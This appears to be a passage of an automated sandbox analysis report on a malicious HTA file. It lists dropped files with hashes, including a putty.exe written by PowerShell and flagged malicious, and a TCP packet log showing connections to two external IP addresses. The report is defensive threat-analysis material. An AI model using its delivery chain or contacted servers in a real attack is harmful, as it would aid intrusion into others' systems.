                        File Type:PDF document, version 1.7, 3 pages
                        Category:dropped
                        Size (bytes):105997
                        Entropy (8bit):7.916350024029986
                        Encrypted:false
                        SSDEEP:3072:9APJu00mzh2zt08TiibCS3rjPH/ipYBZ+veVC/hhY:9APJR0moSbimSfH/AYHrC5hY
                        MD5:0B0E0CD038D7A97F844B4B5068AC704B
                        SHA1:6CFB798FEDFCCF7A6F56324DBA9E635C854FA042
                        SHA-256:44F81C0CA9CC2C931CBF3E5E0CFB383E4BC8627F2F30F5B69180944564A3D53B
                        SHA-512:241C6D1D730FD71D600A6BC51955534A760163BA26160D8EB9DFFFBDD698955492A4FB80405F8C9C81AA15A726E60D2D48BB3C048D90014272128EE9E95F96B1
                        Malicious:false
                        Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 28 0 R/MarkInfo<</Marked true>>/Metadata 108 0 R/ViewerPreferences 109 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 3/Kids[ 3 0 R 21 0 R 23 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 12 0 R/F3 14 0 R/F4 19 0 R>>/ExtGState<</GS10 10 0 R/GS11 11 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 595.32 841.92] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 1377>>..stream..x..ZM..6..7...q70.......=.$d.a...9,a3......I%.[.Uv.e....V....&.....J...?N._.......y......q$..D.>..e.....#jPTpb%......?.G^.....p...8y..x.2..p.$FY.%y..]...0...b..O?...>0&.c.2..x.....N...R..Ou|....H..?..D<..fw..7......,..x..O..O..QS<ax.|.w.}..y.8.R..;...p..vm....<....xT.s. J..G|-....,..?...p..E.%.k....tWZa.{.....'.F....l ..'..O..*u.O..<!.c..5....,...CGM........n........jy..G$.B"#xk&C.h.....

                        C:\Users\user\putty.exe

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):495616
                        Entropy (8bit):6.646541158733514
                        Encrypted:false
                        SSDEEP:6144:wBJBbIOkgKzCe9dMVHsGLULRTXFewKFWTyMTkiYCw+VSvGFal+412cJcnoACqzMD:MJBMOkce9dgHs+UTVhdK12cJOs60
                        MD5:7A0DFC5353FF6DE7DE0208A29FA2FFC9
                        SHA1:44AC2504A02AF84EE142ADAA3EA70B868185906F
                        SHA-256:ABCC2A2D828B1624459CF8C4D2CCDFDCDE62C8D1AB51E438DB200AB3C5C8CD17
                        SHA-512:6DEF636AB478A7F49127C706272FF8B2862A5DE50FD34E1E8509B7C1FF1DA6C87001A764B5C9BB2D56D30534CFAEE10C8C343575E79AE853E42C3306561411CF
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        • Antivirus: Virustotal, Detection: 2%, Browse
                        Joe Sandbox View:
                        • Filename: 82a7vPjX1R.exe, Detection: malicious, Browse
                        • Filename: cgj6THyKZr.exe, Detection: malicious, Browse
                        • Filename: putty.exe, Detection: malicious, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n..K*~..*~..*~..9v..(~../r..(~../r..1~..9v..(~...]...~...v..;~..*~....../r...~...u..+~../r..+~..Rich*~..................PE..L......R.................`...`......%........p....@.........................................................................(............;..............................................................H............p...............................text...._.......`.................. ..`.rdata..*....p.......p..............@..@.data....X...0... ...0..............@....rsrc....;.......@...P..............@..@........................................................................................................................................................................................................................................................................................................................................................

                        Static File Info

                        General

                        File type:HTML document, ASCII text, with very long lines (52660), with CRLF line terminators
                        Entropy (8bit):0.8398533375484833
                        TrID:
                          File name:a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta
                          File size:1'153'504 bytes
                          MD5:24d2c1fc57fcced31089d89c8178605b
                          SHA1:b06f20ea60cbe3785a38702d8e2072aa5f0327ca
                          SHA256:01a56c5b210084f1f6831c9b517bb3bd25564faeb0a2ca075d93027aa632f01b
                          SHA512:d98506cc4750c5edf9d20c0e05b3f46484a4badad2d5be6e6919a6db60029c75ec6391ff87018afde32f8e78c177a8117181ddfc7bff9797e40c50f04e8d24ce
                          SSDEEP:1536:pcK7grIPG3VP6P1OY4vKqoF7B021CCtvIm+lIWFpIl9/pckIV/b22Ksc1vlIIoIA:77gEPEVyPYY4vHoF7/w
                          TLSH:9635DD343979BC2043EBDA1334F14BA65CD9568FC5703A3B199AD423AA342D165B22FF
                          File Content Preview:<head>..</head>..<body>..<table STYLe="wIdTh:100%">..<tr>..<th>HSh</tH>..<th>poA</th>..<th>pBT</th>..<th>odX</Th>..<th>GIW</Th>..<th>rhV</tH>..</TR>..</table>..</body>....<body>..<table STYLe="wIdTh:100%">..<tr>..<th>Nks</tH>..<th>pOX</th>..<th>lgQ</th>..

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Oct 6, 2023 15:30:10.152468920 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:10.431031942 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.432358027 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:10.432358980 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:10.711020947 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.711105108 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.711119890 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.711133003 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.711152077 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.711165905 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.711179018 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:10.711183071 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.711196899 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.711222887 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:10.711222887 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:10.711267948 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.711282015 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.711294889 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.711357117 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:10.711357117 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:10.989872932 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.989900112 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.989913940 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.989929914 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.989943981 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.989958048 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.989965916 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:10.989970922 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.990001917 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:10.990020037 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.990032911 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.990045071 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.990058899 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.990072012 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.990086079 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.990098000 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:10.990098000 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:10.990098000 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:10.990123987 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.990138054 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.990140915 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:10.990149975 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.990185976 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:10.990196943 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:10.990207911 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.990221977 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.990232944 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.990245104 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:10.990320921 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:10.990320921 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.269412041 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269434929 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269448042 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269464016 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269485950 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269495010 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.269500017 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269512892 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269515038 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.269542933 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.269561052 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269573927 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269587040 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269603968 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.269608021 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269634008 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.269682884 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269696951 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269726992 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269743919 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.269769907 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.269788027 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269799948 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269812107 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269824982 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269831896 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.269838095 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269849062 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269860983 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269862890 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.269874096 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269877911 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.269887924 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269913912 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269918919 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.269958973 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269972086 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269984961 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.269992113 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.269998074 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.270010948 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.270020008 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.270040989 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.270090103 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.270122051 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.270137072 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.270162106 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.270174026 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.270185947 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.270188093 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.270215988 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.270239115 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.270242929 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.270251036 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.270272970 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.270299911 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.270353079 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.270404100 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.270416975 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.270457983 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.547960997 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.547986031 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.548000097 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.548017025 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.548033953 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.548055887 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.548080921 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.548094034 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.548111916 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.548130989 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.548155069 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.548177958 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.548177958 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.548207045 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.548227072 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.548240900 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.548261881 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.548263073 CEST804970845.9.190.201192.168.2.8
                          Oct 6, 2023 15:30:11.548295021 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:11.598850965 CEST4970880192.168.2.845.9.190.201
                          Oct 6, 2023 15:30:12.044945002 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:12.313179970 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.316571951 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:12.350323915 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:12.618897915 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.620089054 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.620120049 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.620131969 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.620145082 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.620158911 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.620171070 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.620187998 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.620191097 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:12.620223999 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:12.620295048 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.620307922 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.620321035 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.620333910 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:12.620358944 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:12.888853073 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.888879061 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.888890982 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.888904095 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.888917923 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.888930082 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.888942003 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.888953924 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.888967991 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:12.889004946 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:12.889169931 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.889185905 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.889235973 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.889241934 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:12.889250040 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.889290094 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:12.889478922 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.889494896 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.889527082 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:12.889576912 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.889592886 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.889627934 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:12.889888048 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.889903069 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.889914036 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.889926910 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:12.889945030 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:12.889969110 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.157481909 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.157509089 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.157526016 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.157541037 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.157555103 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.157569885 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.157633066 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.157649994 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.157663107 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.157731056 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.157731056 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.157758951 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.157809973 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.158103943 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.158122063 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.158135891 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.158150911 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.158165932 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.158180952 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.158202887 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.158210039 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.158257008 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.158641100 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.158657074 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.158672094 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.158684969 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.158700943 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.158783913 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.158787966 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.158809900 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.158824921 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.158839941 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.158855915 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.158890009 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.159040928 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.159075022 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.159118891 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.159362078 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.159374952 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.159389019 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.159415960 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.159418106 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.159459114 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.159585953 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.159601927 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.159647942 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.159656048 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.159663916 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.159707069 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.159764051 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.159813881 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.159854889 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.159982920 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.160037994 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.160079956 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.160136938 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.160151958 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.160192013 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.425940990 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.425959110 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.425972939 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.425988913 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426004887 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426008940 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.426038027 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.426079988 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426136971 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.426167965 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426182985 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426193953 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426218987 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.426220894 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426237106 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426259041 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.426337004 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426376104 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.426440001 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426471949 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426515102 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.426630020 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426671982 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426712990 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.426717043 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426773071 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426788092 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426819086 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426822901 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.426861048 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.426919937 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426934958 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426975965 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.426978111 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.426994085 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.427028894 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.427119017 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.427167892 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.427210093 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.427263021 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.427352905 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.427396059 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.427400112 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.427417040 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.427429914 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.427443981 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.427452087 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.427476883 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.427501917 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.427572012 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.427614927 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.427695990 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.427762032 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.427777052 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.427804947 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.427920103 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.427964926 CEST4970980192.168.2.893.93.131.124
                          Oct 6, 2023 15:30:13.428047895 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.428066015 CEST804970993.93.131.124192.168.2.8
                          Oct 6, 2023 15:30:13.428102016 CEST4970980192.168.2.893.93.131.124
